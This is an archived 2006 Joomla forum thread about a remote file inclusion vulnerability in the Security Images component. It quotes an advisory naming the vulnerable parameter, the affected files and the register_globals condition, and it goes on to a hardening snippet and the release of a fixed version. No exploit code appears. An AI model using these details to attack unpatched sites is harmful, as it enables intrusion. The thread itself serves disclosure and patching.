more specifics?
| Joomla! http://forum.joomla.org/ |
|
| [UPGRADE AVAIL.] Security Images Vulnerability http://forum.joomla.org/viewtopic.php?f=296&t=81589 |
Page 1 of 1 |
| Author: | Elpie [ Mon Jul 31, 2006 1:29 pm ] |
| Post subject: | [UPGRADE AVAIL.] Security Images Vulnerability |
Remote file include exploit is in the wild. |
|
| Author: | Kindred [ Mon Jul 31, 2006 2:15 pm ] |
| Post subject: | Re: Security Images 3.0.5 |
more specifics?
|
|
| Author: | Elpie [ Mon Jul 31, 2006 2:47 pm ] |
| Post subject: | Re: Security Images 3.0.5 |
I wish I could give more specifics, but as far as I am aware an official advisory has not yet been issued. I got my information from two blackhat sites, both giving scripts to use. I can only share that information with the projects developers, sorry 
|
|
| Author: | joomlaturk [ Mon Jul 31, 2006 4:28 pm ] |
| Post subject: | Re: Security Images 3.0.5 |
TITLE: Joomla Security Images Component File Inclusion SECUNIA ADVISORY ID: SA21260 VERIFY ADVISORY: http://secunia.com/advisories/21260/ CRITICAL: Highly critical IMPACT: System access WHERE: From remote SOFTWARE: Security Images 3.x (component for Joomla) http://secunia.com/product/11186/ DESCRIPTION: Drago84 has discovered some vulnerabilities in the Security Images component for Joomla, which can be exploited by malicious people to compromise a vulnerable system. Input passed to the "mosConfig_absolute_path" parameter is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources. Affected files: administrator/components/com_securityimages/configinsert.php administrator/components/com_securityimages/lang.php Successful exploitation requires that "register_globals" is enabled. The vulnerabilities have been confirmed in version 3.0.5. Other version may also be affected. SOLUTION: Edit the source code to ensure that input is properly verified. Set "register_globals" to "Off". PROVIDED AND/OR DISCOVERED BY: Drago84 ORIGINAL ADVISORY: http://milw0rm.com/exploits/2083 ---------------------------------------------------------------------- |
|
| Author: | RobS [ Tue Aug 01, 2006 6:09 am ] |
| Post subject: | Re: Security Images 3.0.5 |
Thanks all for the info... added to the official list. |
|
| Author: | averan [ Tue Aug 01, 2006 6:26 pm ] |
| Post subject: | Re: Security Images 3.0.5 |
it seems to me that anyone who understands php could easily patch Security Images. only 2 files are listed as liabilities.... and the fix suggested in this forum is to harden the call to Code: require_once($mosConfig_absolute_path."/administrator/components/com_securityimages/lang.php"); by defining the absolute path: Code: define( 'YOURBASEPATH', dirname(__FILE__) ); require_once( YOURBASEPATH . '/file_to_include.php' ); unfortunately, i don't know php well enough to apply this. anyone? |
|
| Author: | Tonie [ Tue Aug 01, 2006 8:50 pm ] |
| Post subject: | Re: Security Images 3.0.5 |
Version 3.06 has been brought out: http://forge.joomla.org/sf/projects/com_securityimages. |
|
| Author: | tarquel [ Tue Aug 01, 2006 10:14 pm ] |
| Post subject: | Re: Security Images 3.0.5 |
wish i could get the new one to work Using 3.0.6 and the latest Akobook version, but it just refuses to work. Only can get the freecap plugin to appear - the other two just dont do anything - and even though it appears to work, when u submit the guestbook entry - having put the secuity word in, it doesnt work. I thought that I was being dumb and that I hadnt realised it was case sensitive - but either I'm blind, or it really doesnt want to know. I did wonder whether the hardening of the latest joomla but i'm not sure. If anyone wants to try and see, go to the guestbook at: http://www.threeminutewarning.co.uk I really feel like never updating any component or Joomla itself again as something always goes wrong hehe /rant  Cheers Nath. |
|
| Author: | Elpie [ Wed Aug 02, 2006 1:44 am ] |
| Post subject: | Re: Security Images 3.0.5 |
Nath - make sure you report this on the bug tracker on the forge's project pages. Project devs do see these reports but may miss seeing forum posts. |
|
| Author: | tarquel [ Wed Aug 02, 2006 5:31 pm ] |
| Post subject: | Re: Security Images 3.0.5 |
Hi there I've just posted a topic on their forum at http://forums.waltercedric.com/index.ph ... ,16.0.html Can't seem to find the SF for the project hehe Maybe its me being dumb or something today lol Cheers Nath. |
|
| Author: | elmoch [ Wed Aug 02, 2006 10:44 pm ] |
| Post subject: | Re: Security Images 3.0.5 |
tarquel wrote: Hi there I've just posted a topic on their forum at http://forums.waltercedric.com/index.ph ... ,16.0.html Can't seem to find the SF for the project hehe Maybe its me being dumb or something today lol Cheers Nath. Hi Nath, From Walter Cedric's wiki you are referred to http://developer.joomla.org/sf/sfmain/d ... rityimages. So that's the place to go! 
|
|
| Author: | tarquel [ Wed Aug 02, 2006 11:26 pm ] |
| Post subject: | Re: Security Images 3.0.5 |
ahhhhh thats the one Thanks [and it looks like all my problems have been mentioned already - except integration into the SMF Bridge perhaps] Cheers Nath. |
|
| Author: | karryberry [ Thu Dec 20, 2007 4:36 pm ] |
| Post subject: | Re: Security Images 3.0.5 |
Elpie wrote: I wish I could give more specifics, but as far as I am aware an official advisory has not yet been issued. I got my information from two blackhat sites, both giving scripts to use. I can only share that information with the projects developers, sorry tell me more. |
|
| Page 1 of 1 | All times are UTC |
| Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group http://www.phpbb.com/ |
|